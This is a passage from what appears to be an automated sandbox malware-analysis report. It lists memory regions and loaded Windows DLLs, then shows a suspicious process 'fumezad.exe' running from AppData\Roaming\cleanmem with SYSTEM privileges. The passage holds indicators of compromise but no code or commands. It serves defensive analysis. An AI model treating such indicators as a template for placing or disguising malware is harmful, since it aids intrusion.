(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3822 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3823 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3824 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3825 start_va = 0xffaa0000 end_va = 0xffaaafff entry_point = 0xffaa0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3826 start_va = 0x7fef3280000 end_va = 0x7fef3298fff entry_point = 0x7fef3280000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 3827 start_va = 0x7fef5160000 end_va = 0x7fef5237fff entry_point = 0x7fef5160000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 3828 start_va = 0x7fef5270000 end_va = 0x7fef527bfff entry_point = 0x7fef5270000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3829 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3830 start_va = 0x7fef6110000 end_va = 0x7fef611ffff entry_point = 0x7fef6110000 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 3831 start_va = 0x7fef6120000 end_va = 0x7fef6131fff entry_point = 0x7fef6120000 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 3832 start_va = 0x7fef61a0000 end_va = 0x7fef61b8fff entry_point = 0x7fef61a0000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 3833 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3834 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3835 start_va = 0x7fef67d0000 end_va = 0x7fef6843fff entry_point = 0x7fef67d0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3836 start_va = 0x7fef7fa0000 end_va = 0x7fef801bfff entry_point = 0x7fef7fa0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 3837 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3838 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3839 start_va = 0x7fefadd0000 end_va = 0x7fefaddafff entry_point = 0x7fefadd0000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 3840 start_va = 0x7fefade0000 end_va = 0x7fefadf4fff entry_point = 0x7fefade0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 3841 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3842 start_va = 0x7fefafb0000 end_va = 0x7fefafb9fff entry_point = 0x7fefafb0000 region_type = mapped_file name = "nsisvc.dll" filename = "\\Windows\\System32\\nsisvc.dll" (normalized: "c:\\windows\\system32\\nsisvc.dll") Region: id = 3843 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3844 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3845 start_va = 0x7fefb060000 end_va = 0x7fefb0c6fff entry_point = 0x7fefb060000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 3846 start_va = 0x7fefb0e0000 end_va = 0x7fefb0ebfff entry_point = 0x7fefb0e0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3847 start_va = 0x7fefb1a0000 end_va = 0x7fefb1b4fff entry_point = 0x7fefb1a0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3848 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3849 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3850 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 3851 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3852 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3853 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3854 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3855 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3856 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 3857 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 3858 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3859 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3860 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3861 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3862 start_va = 0x7fefd430000 end_va = 0x7fefd4c0fff entry_point = 0x7fefd430000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 3863 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3864 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3865 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3866 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3867 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3868 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3869 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3870 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3871 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3872 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3873 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3874 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3875 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3876 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3877 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3878 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3879 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3880 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3881 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3882 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 3883 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 3884 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 3885 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 3886 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3887 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3888 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3889 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3890 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3891 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3892 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3893 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3894 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3895 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3896 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 229 os_tid = 0xa80 Thread: id = 230 os_tid = 0x9ec Thread: id = 231 os_tid = 0x6ec Thread: id = 232 os_tid = 0x7e0 Thread: id = 233 os_tid = 0x7d0 Thread: id = 234 os_tid = 0x79c Thread: id = 235 os_tid = 0x790 Thread: id = 236 os_tid = 0x78c Thread: id = 237 os_tid = 0x664 Thread: id = 238 os_tid = 0x160 Thread: id = 239 os_tid = 0x15c Thread: id = 240 os_tid = 0x128 Thread: id = 241 os_tid = 0x118 Thread: id = 242 os_tid = 0x11c Thread: id = 251 os_tid = 0x8d0 Thread: id = 256 os_tid = 0x6ec Thread: id = 257 os_tid = 0x97c Thread: id = 258 os_tid = 0x8ec Thread: id = 259 os_tid = 0x5d8 Thread: id = 260 os_tid = 0x6c4 Thread: id = 261 os_tid = 0x718 Thread: id = 262 os_tid = 0x8b8 Thread: id = 263 os_tid = 0x920 Thread: id = 268 os_tid = 0x9d8 Thread: id = 286 os_tid = 0x2c8 Thread: id = 287 os_tid = 0x244 Thread: id = 288 os_tid = 0x710 Thread: id = 290 os_tid = 0x6cc Thread: id = 291 os_tid = 0x854 Thread: id = 293 os_tid = 0xad4 Thread: id = 296 os_tid = 0xb78 Thread: id = 377 os_tid = 0xaf8 Process: id = "33" image_name = "fumezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe" page_root = "0x46e33000" os_pid = "0x934" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x350" cmd_line = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4261 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4262 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4263 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4264 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4265 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4266 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4267 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4268 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fumezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe") Region: id = 4269 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4270 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4271 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4272 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4273 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4274 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4275 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4276 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4277 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4278 start_va = 0x230000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 4279 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4280 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4281 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4282 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4283 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4284 start_va = 0x500000 end_va = 0x5fffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4285 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4286 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4287 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 4288 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 4289 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4290 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4291 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 4292 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4293 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4294 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4295 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4296 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4297 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4298 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4299 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4300 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4301 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4302 start_va = 0x600000 end_va = 0x787fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 4303 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4304 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4305 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4306 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4307 start_va = 0x790000 end_va = 0x910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 4308 start_va = 0x920000 end_va = 0x9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000920000" filename = "" Region: id = 4664 start_va = 0x220000 end_va = 0x220fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 4665 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4666 start_va = 0x2c0000 end_va = 0x304fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4667 start_va = 0x310000 end_va = 0x338fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 4668 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 4686 start_va = 0x9e0000 end_va = 0xb1bfff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 4687 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4688 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4689 start_va = 0xb20000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 4690 start_va = 0xb20000 end_va = 